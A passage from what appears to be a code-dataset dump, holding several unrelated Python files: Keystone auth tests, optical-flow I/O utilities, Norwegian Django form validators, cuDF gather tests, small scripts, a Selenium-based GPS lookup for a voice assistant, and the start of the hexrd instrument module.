expected\n\n\n@pytest.mark.parametrize('raws, expected', [\n (\n {\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_INTERFACE': 'internal',\n 'OS_IDENTITY_API_VERSION': 'region_name'\n },\n {\n 'username': 'admin',\n 'password': 'keystone',\n 'auth_url': 'http://10.20.11.11:35357/v3',\n 'tenant_name': 'admin',\n 'user_domain_name': 'Default',\n 'project_domain_name': 'Default',\n 'project_name': 'admin'\n }),\n (\n {\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_ENDPOINT_TYPE': 'Default',\n 'OS_REGION_NAME': 'Default'\n },\n {\n 'username': 'admin',\n 'password': 'keystone',\n 'auth_url': 'http://10.20.11.11:35357/v3',\n 'tenant_name': 'admin',\n 'user_domain_name': 'Default',\n 'project_domain_name': 'Default',\n 'project_name': 'admin',\n 'endpoint_type': 'Default',\n 'region_name': 'Default'\n }\n )])\ndef test__parse_credentials_in_Keystoneauth(raws, expected):\n assert Keystoneauth._parse_credentials(raws) == expected\n\n\n@pytest.fixture(scope=\"session\")\ndef openrc_conf_file_dir(data_root):\n return os.path.join(data_root, 'openrc_conf')\n\n\ndef test_session(openrc_conf_file_dir):\n openrc = os.path.join(openrc_conf_file_dir, 'admin-openrc.sh')\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient.session\n\n\n@pytest.mark.parametrize('openrc_file_name, expected', [\n (\n 'admin-openrc.sh',\n {\n 'OS_PROJECT_DOMAIN_NAME': 'Default',\n 'OS_USER_DOMAIN_NAME': 'Default',\n 'OS_PROJECT_NAME': 'admin',\n 'OS_TENANT_NAME': 'admin',\n 'OS_USERNAME': 'admin',\n 'OS_PASSWORD': 'keystone',\n 'OS_AUTH_URL': 'http://10.20.11.11:35357/v3',\n 'OS_INTERFACE': 'internal',\n 'OS_IDENTITY_API_VERSION': '3'\n }\n )])\ndef test__parse_openrc(openrc_conf_file_dir, openrc_file_name, expected):\n openrc = os.path.join(openrc_conf_file_dir, openrc_file_name)\n KeystoneClient = Keystoneauth(openrc)\n ret_openrc_dict = KeystoneClient._parse_openrc()\n assert expected == ret_openrc_dict\n\n\n@pytest.mark.parametrize('openrc_file_name', [\n (\n 'admin-openrc.sh'\n )])\ndef test__get_auth(openrc_conf_file_dir, openrc_file_name,):\n openrc = os.path.join(openrc_conf_file_dir, openrc_file_name)\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient._get_auth()\n"} {"ext": "py", "sha": "1a3022641185cea50540e9df4b5653ac22fb94cf", "content": "import re\nfrom os.path import *\n\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nfrom PIL import Image\n\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n\nTAG_CHAR = np.array([202021.25], np.float32)\n\n\ndef read_flow_middlebury(fn):\n \"\"\"\n Read .flo file in Middlebury format\n\n Parameters\n -----------\n fn : str\n Absolute path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n # Code adapted from:\n # http://stackoverflow.com/questions/28013200/reading-middlebury-flow-files-with-python-bytes-array-numpy\n\n # WARNING: this will work on little-endian architectures (eg Intel x86) only!\n # print 'fn = %s'%(fn)\n with open(fn, \"rb\") as f:\n magic = np.fromfile(f, np.float32, count=1)\n if 202021.25 != magic:\n print(\"Magic number incorrect. Invalid .flo file\")\n return None\n else:\n w = np.fromfile(f, np.int32, count=1)\n h = np.fromfile(f, np.int32, count=1)\n # print 'Reading %d x %d flo file\\n' % (w, h)\n data = np.fromfile(f, np.float32, count=2 * int(w) * int(h))\n # Reshape data into 3D array (banda, columns, rows)\n return np.resize(data, (int(h), int(w), 2))\n\n\ndef read_flow_pfm(file):\n \"\"\"\n Read optical flow from a .pfm file\n\n Parameters\n -----------\n file : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n\n file = open(file, \"rb\")\n\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = file.readline().rstrip()\n if header == b\"PF\":\n color = True\n elif header == b\"Pf\":\n color = False\n else:\n raise Exception(\"Not a PFM file.\")\n\n dim_match = re.match(rb\"^(\\d+)\\s(\\d+)\\s$\", file.readline())\n if dim_match:\n width, height = map(int, dim_match.groups())\n else:\n raise Exception(\"Malformed PFM header.\")\n\n scale = float(file.readline().rstrip())\n if scale < 0: # little-endian\n endian = \"<\"\n scale = -scale\n else:\n endian = \">\" # big-endian\n\n data = np.fromfile(file, endian + \"f\")\n shape = (height, width, 3) if color else (height, width)\n\n data = np.reshape(data, shape)\n data = np.flipud(data)\n\n return data\n\n\ndef read_flow_png(filename):\n \"\"\"\n Read optical flow from a png file.\n\n Parameters\n -----------\n filename : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n\n valid : np.ndarray\n Valid flow map\n \"\"\"\n flow = cv2.imread(filename, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)\n flow = flow[:, :, ::-1].astype(np.float32)\n flow, valid = flow[:, :, :2], flow[:, :, 2]\n flow = (flow - 2**15) / 64.0\n return flow, valid\n\n\ndef write_flow(filename, uv, v=None):\n \"\"\"Write optical flow to file.\n\n If v is None, uv is assumed to contain both u and v channels,\n stacked in depth.\n\n Parameters\n ----------\n filename : str\n Path to file\n uv : np.ndarray\n Optical flow\n v : np.ndarray, optional\n Optional second channel\n \"\"\"\n\n # Original code by Deqing Sun, adapted from Daniel Scharstein.\n\n n_bands = 2\n\n if v is None:\n assert uv.ndim == 3\n assert uv.shape[2] == 2\n u = uv[:, :, 0]\n v = uv[:, :, 1]\n else:\n u = uv\n\n assert u.shape == v.shape\n height, width = u.shape\n f = open(filename, \"wb\")\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width * n_bands))\n tmp[:, np.arange(width) * 2] = u\n tmp[:, np.arange(width) * 2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()\n\n\ndef read_image(file_name):\n \"\"\"\n Read images from a variety of file formats\n\n Parameters\n -----------\n file_name : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n \"\"\"\n\n ext = splitext(file_name)[-1]\n\n if ext == \".png\" or ext == \".jpeg\" or ext == \".ppm\" or ext == \".jpg\":\n return Image.open(file_name)\n\n elif ext == \".bin\" or ext == \".raw\":\n return np.load(file_name)\n\n return []\n\n\ndef read_flow(file_name):\n \"\"\"\n Read ground truth flow from a variety of file formats\n\n Parameters\n -----------\n file_name : str\n Path to flow file\n\n Returns\n --------\n flow : np.ndarray\n Optical flow map\n\n valid : None if .flo and .pfm files else np.ndarray\n Valid flow map\n \"\"\"\n\n ext = splitext(file_name)[-1]\n\n if ext == \".flo\":\n flow = read_flow_middlebury(file_name).astype(np.float32)\n return flow, None\n\n elif ext == \".pfm\":\n\n flow = read_flow_pfm(file_name).astype(np.float32)\n\n if len(flow.shape) == 2:\n return flow, None\n else:\n return flow[:, :, :-1], None\n\n elif ext == \".png\":\n return read_flow_png(file_name)\n\n return []\n\n\nclass InputPadder:\n \"\"\"\n Class to pad / unpad the input to a network with a given padding\n\n Parameters\n -----------\n dims : tuple\n Dimensions of the input\n divisor : int\n Divisor to make the input evenly divisible by\n mode : str\n Padding mode\n \"\"\"\n\n def __init__(self, dims, divisor=8, mode=\"sintel\"):\n\n self.ht, self.wd = dims[-2:]\n pad_ht = (((self.ht // divisor) + 1) * divisor - self.ht) % divisor\n pad_wd = (((self.wd // divisor) + 1) * divisor - self.wd) % divisor\n\n if mode == \"sintel\":\n self._pad = [\n pad_wd // 2,\n pad_wd - pad_wd // 2,\n pad_ht // 2,\n pad_ht - pad_ht // 2,\n ]\n else:\n self._pad = [pad_wd // 2, pad_wd - pad_wd // 2, 0, pad_ht]\n\n def pad(self, *inputs):\n \"\"\"\n Pad the input\n\n Parameters\n -----------\n inputs : list\n List of inputs to pad\n\n Returns\n --------\n list\n Padded inputs\n \"\"\"\n\n return [F.pad(x, self._pad, mode=\"replicate\") for x in inputs]\n\n def unpad(self, x):\n \"\"\"\n Unpad the input\n\n Parameters\n -----------\n x : torch.Tensor\n Input to unpad\n\n Returns\n --------\n torch.Tensor\n Unpadded input\n \"\"\"\n\n ht, wd = x.shape[-2:]\n c = [self._pad[2], ht - self._pad[3], self._pad[0], wd - self._pad[1]]\n\n return x[..., c[0] : c[1], c[2] : c[3]]\n"} {"ext": "py", "sha": "1a302273664eae240f4d94c2a86f0229ee564ceb", "content": "\"\"\"Norwegian-specific Form helpers.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport datetime\nimport re\n\nfrom django.core.validators import EMPTY_VALUES\nfrom django.forms import ValidationError\nfrom django.forms.fields import CharField, Field, RegexField, Select\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom localflavor.generic.forms import DeprecatedPhoneNumberFormFieldMixin\n\nfrom .no_municipalities import MUNICIPALITY_CHOICES\n\n\nclass NOZipCodeField(RegexField):\n \"\"\"\n A form field that validates input as a Norwegian zip code.\n\n Valid codes have four digits.\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a zip code in the format XXXX.'),\n }\n\n def __init__(self, max_length=None, min_length=None, *args, **kwargs):\n super(NOZipCodeField, self).__init__(r'^\\d{4}$',\n max_length, min_length, *args, **kwargs)\n\n\nclass NOMunicipalitySelect(Select):\n \"\"\"A Select widget that uses a list of Norwegian municipalities (fylker) as its choices.\"\"\"\n\n def __init__(self, attrs=None):\n super(NOMunicipalitySelect, self).__init__(attrs, choices=MUNICIPALITY_CHOICES)\n\n\nclass NOSocialSecurityNumber(Field):\n \"\"\"Algorithm is documented at http://no.wikipedia.org/wiki/Personnummer.\"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a valid Norwegian social security number.'),\n }\n\n def clean(self, value):\n super(NOSocialSecurityNumber, self).clean(value)\n if value in EMPTY_VALUES:\n return ''\n\n if not re.match(r'^\\d{11}$', value):\n raise ValidationError(self.error_messages['invalid'])\n\n self.birthday = self._get_birthday(value)\n self.gender = self._get_gender(value)\n\n digits = map(int, list(value))\n weight_1 = [3, 7, 6, 1, 8, 9, 4, 5, 2, 1, 0]\n weight_2 = [5, 4, 3, 2, 7, 6, 5, 4, 3, 2, 1]\n\n def multiply_reduce(aval, bval):\n return sum([(a * b) for (a, b) in zip(aval, bval)])\n\n if multiply_reduce(digits, weight_1) % 11 != 0:\n raise ValidationError(self.error_messages['invalid'])\n if multiply_reduce(digits, weight_2) % 11 != 0:\n raise ValidationError(self.error_messages['invalid'])\n\n return value\n\n def _get_gender(self, value):\n sexnum = int(value[8])\n if sexnum % 2 == 0:\n gender = 'F'\n else:\n gender = 'M'\n return gender\n\n def _get_birthday(self, value):\n birthday = None\n day = int(value[:2])\n month = int(value[2:4])\n year2 = int(value[4:6])\n inum = int(value[6:9])\n try:\n if 000 <= inum < 500:\n birthday = datetime.date(1900 + year2, month, day)\n if 500 <= inum < 750 and year2 > 54:\n birthday = datetime.date(1800 + year2, month, day)\n if 500 <= inum < 1000 and year2 < 40:\n birthday = datetime.date(2000 + year2, month, day)\n if 900 <= inum < 1000 and year2 > 39:\n birthday = datetime.date(1900 + year2, month, day)\n except ValueError:\n raise ValidationError(self.error_messages['invalid'])\n return birthday\n\n\nclass NOBankAccountNumber(CharField):\n \"\"\"\n A form field for Norwegian bank account numbers.\n\n Performs MOD11 with the custom weights for the Norwegian bank account numbers,\n including a check for a remainder of 0, in which event the checksum is also 0.\n\n Usually their string representation is along the lines of ZZZZ.YY.XXXXX, where the last X is the check digit.\n They're always a total of 11 digits long, with 10 out of these 11 being the actual account number itself.\n\n * Accepts, and strips, account numbers with extra spaces.\n * Accepts, and strips, account numbers provided in form of XXXX.YY.XXXXX.\n\n .. note:: No consideration is taking for banking clearing numbers as of yet, seeing as these are only used between\n banks themselves.\n\n .. versionadded:: 1.5\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('Enter a valid Norwegian bank account number.'),\n 'invalid_checksum': _('Invalid control digit. Enter a valid Norwegian bank account number.'),\n 'invalid_length': _('Invalid length. Norwegian bank account numbers are 11 digits long.'),\n }\n\n def validate(self, value):\n super(NOBankAccountNumber, self).validate(value)\n\n if value is '':\n # It's alright to be empty.\n return\n elif not value.isdigit():\n # You must only contain decimals.\n raise ValidationError(self.error_messages['invalid'])\n elif len(value) is not 11:\n # They only have one length: the number is 10!\n # That being said, you always store them with the check digit included, so 11.\n raise ValidationError(self.error_messages['invalid_length'])\n\n # The control/check digit is the last digit\n check_digit = int(value[-1])\n bank_number = value[:-1]\n\n # These are the weights by which we multiply to get our checksum digit\n weights = [5, 4, 3, 2, 7, 6, 5, 4, 3, 2]\n result = sum(w * (int(x)) for w, x in zip(weights, bank_number))\n remainder = result % 11\n # The checksum is 0 in the event there's no remainder, seeing as we cannot have a checksum of 11\n # when 11 is one digit longer than we've got room for\n checksum = 0 if remainder is 0 else 11 - remainder\n\n if checksum != check_digit:\n raise ValidationError(self.error_messages['invalid_checksum'])\n\n def to_python(self, value):\n value = super(NOBankAccountNumber, self).to_python(value)\n return value.replace('.', '').replace(' ', '')\n\n def prepare_value(self, value):\n if value in EMPTY_VALUES:\n return value\n return '{}.{}.{}'.format(value[0:4], value[4:6], value[6:11])\n\n\nclass NOPhoneNumberField(RegexField, DeprecatedPhoneNumberFormFieldMixin):\n \"\"\"\n Field with phonenumber validation.\n\n Requires a phone number with 8 digits and optional country code\n \"\"\"\n\n default_error_messages = {\n 'invalid': _('A phone number must be 8 digits and may have country code'),\n }\n\n def __init__(self, max_length=None, min_length=None, *args, **kwargs):\n super(NOPhoneNumberField, self).__init__(\n r'^(?:\\+47)? ?(\\d{3}\\s?\\d{2}\\s?\\d{3}|\\d{2}\\s?\\d{2}\\s?\\d{2}\\s?\\d{2})$',\n max_length, min_length, *args, **kwargs)\n"} {"ext": "py", "sha": "1a30237343fbc293756aaa70da110dd64c11e79d", "content": "from __future__ import division, print_function\n\nimport numpy as np\n\nfrom librmm_cffi import librmm as rmm\n\nimport cudf._lib as libcudf\nfrom cudf.core import Series\nfrom cudf.core.column import column\n\n\ndef test_gather_single_col():\n col = column.as_column(np.arange(100), dtype=np.int32)\n gather_map = np.array([0, 1, 2, 3, 5, 8, 13, 21], dtype=np.int32)\n\n device_gather_map = rmm.to_device(gather_map)\n\n out = libcudf.copying.gather(col, device_gather_map)\n\n np.testing.assert_array_equal(out.to_array(), gather_map)\n\n\ndef test_gather_cols():\n cols = [\n column.as_column(np.arange(10), dtype=np.int32),\n column.as_column(np.arange(0.0, 2.0, 0.2), dtype=np.float32),\n ]\n gather_map = np.array([0, 1, 2, 3, 5, 8], dtype=np.int32)\n\n expected = np.array(gather_map * 0.2, dtype=np.float32)\n\n device_gather_map = rmm.to_device(gather_map)\n\n out = libcudf.copying.gather(cols, device_gather_map)\n\n np.testing.assert_array_equal(out[0].to_array(), gather_map)\n np.testing.assert_array_almost_equal(out[1].to_array(), expected)\n\n\ndef test_gather_string_col():\n col = column.as_column([\"a\", \"b\", \"c\", \"d\"])\n gather_map = column.as_column([0, 2, 3], dtype=\"int32\").data.mem\n result = libcudf.copying.gather(col, gather_map)\n assert result.data.to_host() == [\"a\", \"c\", \"d\"]\n\n col = column.as_column([\"a\", \"b\", None, \"d\"])\n gather_map = column.as_column([0, 2, 3], dtype=\"int32\").data.mem\n result = libcudf.copying.gather(col, gather_map)\n assert result.data.to_host() == [\"a\", None, \"d\"]\n\n\ndef test_null_copy():\n col = Series(np.arange(2049))\n col[:] = None\n assert len(col) == 2049\n"} {"ext": "py", "sha": "1a302539f41176b68fc899c25e0f9d2336eec703", "content": "#!/usr/bin/env python\n\nfrom PyZ3950 import zoom\n\ndef run ():\n conn = zoom.Connection ('amicus.nlc-bnc.ca', 210)\n conn.databaseName = 'NL'\n q = zoom.Query ('CCL', 'ti=\"1066\"')\n ss = conn.scan (q)\n for s in ss[0:10]:\n print s\n \n\nif __name__ == '__main__':\n run ()\n"} {"ext": "py", "sha": "1a30266b5b34e7e07dd8b5ba15729b82ce3d31de", "content": "import sys,os,random\nfrom phrasemachine import phrasemachine as pm; reload(pm)\ntext=open(\"sloths.txt\").read()\n# text = open(\"testdata/wine-nltk.txt\").read().decode(\"utf8\",'ignore')\n# tt=pm.get_stdeng_spacy_tagger()\nd=tt.tag_text(text)\n\ndef loop():\n while True:\n pat = raw_input(\"Pattern: \")\n # p = pm.get_phrases(tokens=d['tokens'], postags=d['pos'], regex=pat, minlen=1)['counts']\n p = pm.get_phrases(open(\"sloths.txt\").read(), tagger='spacy', regex=pat, minlen=1)['counts']\n phrases = p.keys()\n ptok = []\n for phrase in phrases:\n # print [phrase]\n ptok += [phrase]*p[phrase]\n if len(ptok) < 10:\n xx = ptok\n else:\n xx = [random.choice(ptok) for i in xrange(10)]\n # xx = [random.choice(phrases) for i in xrange(10)]\n # print xx\n print u', '.join(xx).encode(\"utf8\")\n\n\n"} {"ext": "py", "sha": "1a3026e7f45b00b8eb123506ce710f31ae1ad3e4", "content": "from .Function_Module import Function_Module\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nimport selenium\r\nfrom geopy.geocoders import Nominatim\r\nimport time\r\nimport os\r\nimport pathlib\r\n\r\nclass get_gps_location(Function_Module):\r\n name = \"get_gps_location\"\r\n help_description = \"Current location\"\r\n\r\n time_sleep = 2\r\n error = \"Sir, I'm sorry I can't get my location.\"\r\n chrome_not_found_error = \"Sir, I can't find the Chrome binaries. Make sure that C:\\Program Files(x86)\\Google\\Chrome\\Application\\chrome.exe is present!\"\r\n\r\n def respond(self, entities):\r\n try:\r\n coordinates = self.getLocation(self)\r\n return self.convert_to_location(self, coordinates)\r\n except selenium.common.exceptions.WebDriverException:\r\n return self.chrome_not_found_error\r\n except:\r\n return self.error\r\n\r\n def getLocation(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--use-fake-ui-for-media-stream\")\r\n # You shouldn't see the browser, so; headless does not work, otherwise gps will not be activated!\r\n # chrome_options.add_argument (\"headless\")\r\n\r\n timeout = 20\r\n\r\n # The directory in which the Chrome driver (required for Selenium) is located: Is the script directory, i.e. the same\r\n chrome_driver_path = str( str( pathlib.Path(__file__).parent.absolute() ) + r\"\\chromedriver.exe\" )\r\n print(\"Chrome-Driver Path: \", chrome_driver_path)\r\n\r\n driver = webdriver.Chrome(executable_path=chrome_driver_path, chrome_options=chrome_options)\r\n driver.get(\"https://mycurrentlocation.net/\")\r\n wait = WebDriverWait(driver, timeout)\r\n time.sleep(self.time_sleep)\r\n\r\n longitude = driver.find_elements_by_xpath('//*[@id=\"longitude\"]')\r\n longitude = [x.text for x in longitude]\r\n longitude = str(longitude[0])\r\n latitude = driver.find_elements_by_xpath('//*[@id=\"latitude\"]')\r\n latitude = [x.text for x in latitude]\r\n latitude = str(latitude[0])\r\n driver.quit()\r\n\r\n coordinates = [latitude, longitude]\r\n return coordinates\r\n\r\n def convert_to_location(self, coordinates):\r\n geolocator = Nominatim(user_agent=\"F.R.I.D.A.Y\")\r\n location = geolocator.reverse(coordinates[0] + ',' + coordinates[1])\r\n\r\n print(location.raw)\r\n\r\n # Compose an answer text from the address\r\n address = location.raw['address']\r\n\r\n # Street with 'the'\r\n if(\"street\" in address['road'] or \"road\" in address['road']):\r\n result = \"According to GPS, you are currently in the \"+ address['road'] + ', ' + address['town'] + ', ' + address['state'] + ', ' + address['country'] + '.'\r\n\r\n else:\r\n result = \"According to GPS, you are currently in \"+ address['road'] + ', ' + address['town'] + ', ' + address['state'] + ', ' + address['country'] + '.'\r\n \r\n return result"} {"ext": "py", "sha": "1a3027db99844428cefed2186cc6eaa24fc7c394", "content": "# -*- coding: utf-8 -*-\n# =============================================================================\n# Copyright (c) 2012, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by Joel Bernier and others.\n# LLNL-CODE-529294.\n# All rights reserved.\n#\n# This file is part of HEXRD. For details on dowloading the source,\n# see the file COPYING.\n#\n# Please also see the file LICENSE.\n#\n# This program is free software; you can redistribute it and/or modify it under\n# the terms of the GNU Lesser General Public License (as published by the Free\n# Software Foundation) version 2.1 dated February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF MERCHANTABILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. See the terms and conditions of the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program (see file LICENSE); if not, write to\n# the Free Software Foundation, Inc., 59 Temple Place, Suite 330,\n# Boston, MA 02111-1307 USA or visit .\n# =============================================================================\n\"\"\"\nCreated on Fri Dec 9 13:05:27 2016\n\n@author: bernier2\n\"\"\"\nimport copy\nimport os\nfrom concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor\nfrom functools import partial\n\nimport yaml\n\nimport h5py\n\nimport numpy as np\n\nfrom io import IOBase\n\nfrom scipy import ndimage\nfrom scipy.linalg.matfuncs import logm\n\nfrom hexrd import constants\nfrom hexrd.gridutil import cellConnectivity, cellIndices, make_tolerance_grid\nfrom hexrd import matrixutil as mutil\nfrom hexrd.transforms.xfcapi import \\\n anglesToGVec, \\\n angularDifference, \\\n detectorXYToGvec, \\\n gvecToDetectorXY, \\\n makeOscillRotMat, \\\n makeRotMatOfExpMap, \\\n mapAngle, \\\n oscillAnglesOfHKLs, \\\n rowNorm, \\\n unitRowVector\nfrom hexrd import xrdutil\nfrom hexrd.crystallography import PlaneData\nfrom hexrd import constants as ct\nfrom hexrd.rotations import angleAxisOfRotMat, RotMatEuler\nfrom hexrd import distortion as distortion_pkg\nfrom hexrd.utils.compatibility import h5py_read_string\nfrom hexrd.utils.concurrent import distribute_tasks\nfrom hexrd.utils.decorators import memoize\nfrom hexrd.valunits import valWUnit\nfrom hexrd.wppf import LeBail\n\nfrom skimage.draw import polygon\nfrom skimage.util import random_noise\nfrom hexrd.wppf import wppfsupport\n\ntry:\n from fast_histogram import histogram1d\n fast_histogram = True\nexcept(ImportError):\n from numpy import histogram as histogram1d\n fast_histogram = False\n\nif ct.USE_NUMBA:\n import numba\n\n# =============================================================================\n# PARAMETERS\n# =============================================================================\n\ninstrument_name_DFLT = 'instrument'\n\nbeam_energy_DFLT = 65.351\nbeam_vec_DFLT = ct.beam_vec\n\neta_vec_DFLT = ct.eta_vec\n\npanel_id_DFLT = 'generic'\nnrows_DFLT = 2048\nncols_DFLT = 2048\npixel_size_DFLT = (0.2, 0.2)\n\ntilt_params_DFLT = np.zeros(3)\nt_vec_d_DFLT = np.r_[0., 0., -1000.]\n\nchi_DFLT = 0.\nt_vec_s_DFLT = np.zeros(3)\n\nmax_workers_DFLT = max(1, os.cpu_count() - 1)\n\n\"\"\"\nCalibration parameter flags\n\n for instrument level, len is 7\n\n [beam energy,\n beam azimuth,\n beam elevation,\n chi,\n tvec[0],\n tvec[1],\n tvec[2],\n ]\n\"\"\"\ninstr_calibration_flags_DFLT = np.zeros(7, dtype=bool)\n\n\"\"\"\n for each panel, order is:\n\n [tilt[0],\n tilt[1],\n tilt[2],\n tvec[0],\n tvec[1],\n tvec[2],\n ,\n ]\n\n len is 6 + len(dparams) for each panel\n by default, dparams are not set for refinement\n\"\"\"\npanel_calibration_flags_DFLT = np.array(\n [1, 1, 1, 1, 1, 1],\n dtype=bool\n)\n\nbuffer_key = 'buffer'\ndistortion_key = 'distortion'\n\n# =============================================================================\n# UTILITY METHODS\n# =============================================================================\n\n\ndef _fix_indices(idx, lo, hi):\n nidx = np.array(idx)\n off_lo = nidx < lo\n off_hi = nidx > hi\n nidx[off_lo] = lo\n nidx[off_hi] = hi\n return nidx\n\n\ndef calc_beam_vec(azim, pola):\n \"\"\"\n Calculate unit beam propagation vector from\n spherical coordinate spec in DEGREES.\n\n ...MAY CHANGE; THIS IS ALSO LOCATED IN XRDUTIL!\n \"\"\"\n tht = np.radians(azim)\n phi = np.radians(pola)\n bv = np.r_[\n np.sin(phi)*np.cos(tht),\n np.cos(phi),\n np.sin(phi)*np.sin(tht)]\n return -bv\n\n\ndef calc_angles_from_beam_vec(bvec):\n \"\"\"\n Return the azimuth and polar angle from a beam\n vector\n \"\"\"\n bvec = np.atleast_1d(bvec).flatten()\n nvec = unitRowVector(-bvec)\n azim = float(\n np.degrees(np.arctan2(nvec[2], nvec[0]))\n )\n pola = float(np.degrees(np.arccos(nvec[1])))\n return azim, pola\n\n\ndef migrate_instrument_config(instrument_config):\n \"\"\"utility function to generate old instrument config dictionary\"\"\"\n cfg_list = []\n for detector_id in instrument_config['detectors']:\n cfg_list.append(\n dict(\n detector=instrument_config['detectors'][detector_id],\n oscillation_stage=instrument_config['oscillation_stage'],\n )\n )\n return cfg_list\n\n\ndef angle_in_range(angle, ranges, ccw=True, units='degrees'):\n \"\"\"\n Return the index of the first wedge the angle is found in\n\n WARNING: always clockwise; assumes wedges are not overlapping\n \"\"\"\n tau = 360.\n if units.lower() == 'radians':\n tau = 2*np.pi\n w = np.nan\n for i, wedge in enumerate(ranges):\n amin = wedge[0]\n amax = wedge[1]\n check = amin + np.mod(angle - amin, tau)\n if check < amax:\n w = i\n break\n return w\n\n\n# ???: move to gridutil?\ndef centers_of_edge_vec(edges):\n assert np.r_[edges].ndim == 1, \"edges must be 1-d\"\n return np.average(np.vstack([edges[:-1], edges[1:]]), axis=0)\n\n\ndef max_tth(instr):\n \"\"\"\n Return the maximum Bragg angle (in radians) subtended by the instrument.\n\n Parameters\n ----------\n instr : hexrd.instrument.HEDMInstrument instance\n the instrument class to evalutate.\n\n Returns\n -------\n tth_max : float\n The maximum observable Bragg angle by the instrument in radians.\n \"\"\"\n tth_max = 0.\n for det in instr.detectors.values():\n ptth, peta = det.pixel_angles()\n tth_max = max(np.max(ptth), tth_max)\n return tth_max\n\n\ndef pixel_resolution(instr):\n \"\"\"\n Return the minimum, median, and maximum angular\n resolution of the instrument.\n\n Parameters\n ----------\n instr : HEDMInstrument instance\n An instrument.\n\n Returns\n -------\n tth_stats : float\n min/median/max tth resolution in radians.\n eta_stats : TYPE\n min/median/max eta resolution in radians.\n\n \"\"\"\n max_tth = np.inf\n max_eta = np.inf\n min_tth = -np.inf\n min_eta = -np.inf\n ang_ps_full = []\n for panel in instr.detectors.values():\n angps = panel.angularPixelSize(\n np.stack(\n panel.pixel_coords,\n axis=0\n ).reshape(2, np.cumprod(panel.shape)[-1]).T\n )\n ang_ps_full.append(angps)\n max_tth = min(max_tth, np.min(angps[:, 0]))\n max_eta = min(max_eta, np.min(angps[:, 1]))\n min_tth = max(min_tth, np.max(angps[:, 0]))\n min_eta = max(min_eta, np.max(angps[:, 1]))\n pass\n med_tth, med_eta = np.median(np.vstack(ang_ps_full), axis=0).flatten()\n return (min_tth, med_tth, max_tth), (min_eta, med_eta, max_eta)\n\n\ndef max_resolution(instr):\n \"\"\"\n Return the maximum angular resolution of the instrument.\n\n Parameters\n ----------\n instr : HEDMInstrument instance\n An instrument.\n\n Returns\n -------\n max_tth : float\n Maximum tth resolution in radians.\n max_eta : TYPE\n maximum eta resolution in radians.\n\n \"\"\"\n max_tth = np.inf\n max_eta = np.inf\n for panel in instr.detectors.values():\n angps = panel.angularPixelSize(\n np.stack(\n panel.pixel_coords,\n axis=0\n ).reshape(2, np.cumprod(panel.shape)[-1]).T\n )\n max_tth = min(max_tth, np.min(angps[:, 0]))\n max_eta = min(max_eta, np.min(angps[:, 1]))\n return max_tth, max_eta\n\n\ndef _gaussian_dist(x, cen, fwhm):\n sigm = fwhm/(2*np.sqrt(2*np.log(2)))\n return np.exp(-0.5*(x - cen)**2/sigm**2)\n\n\ndef _sigma_to_fwhm(sigm):\n return sigm*ct.sigma_to_fwhm\n\n\ndef _fwhm_to_sigma(fwhm):\n return fwhm/ct.sigma_to_fwhm\n\n\n# FIXME find a better place for this, and maybe include loop over pixels\nif ct.USE_NUMBA:\n @numba.njit(nogil=True, cache=True)\n def _solid_angle_of_triangle(vtx_list):\n norms = np.sqrt(np.sum(vtx_list*vtx_list, axis=1))\n norms_prod = norms[0] * norms[1] * norms[2]\n scalar_triple_product = np.dot(vtx_list[0],\n np.cross(vtx_list[2], vtx_list[1]))\n denominator = norms_prod \\\n + norms[0]*np.dot(vtx_list[1], vtx_list[2]) \\\n + norms[1]*np.dot(vtx_list[2], vtx_list[0]) \\\n + norms[2]*np.dot(vtx_list[0], vtx_list[1])\n\n return 2.*np.arctan2(scalar_triple_product, denominator)\nelse:\n def _solid_angle_of_triangle(vtx_list):\n norms = rowNorm(vtx_list)\n norms_prod = np.cumprod(norms)[-1]\n scalar_triple_product = np.dot(vtx_list[0],\n np.cross(vtx_list[2], vtx_list[1]))\n denominator = norms_prod \\\n + norms[0]*np.dot(vtx_list[1], vtx_list[2]) \\\n + norms[1]*np.dot(vtx_list[2], vtx_list[0]) \\\n + norms[2]*np.dot(vtx_list[0], vtx_list[1])\n\n return 2.*np.arctan2(scalar_triple_product, denominator)\n\n# =============================================================================\n# CLASSES\n# 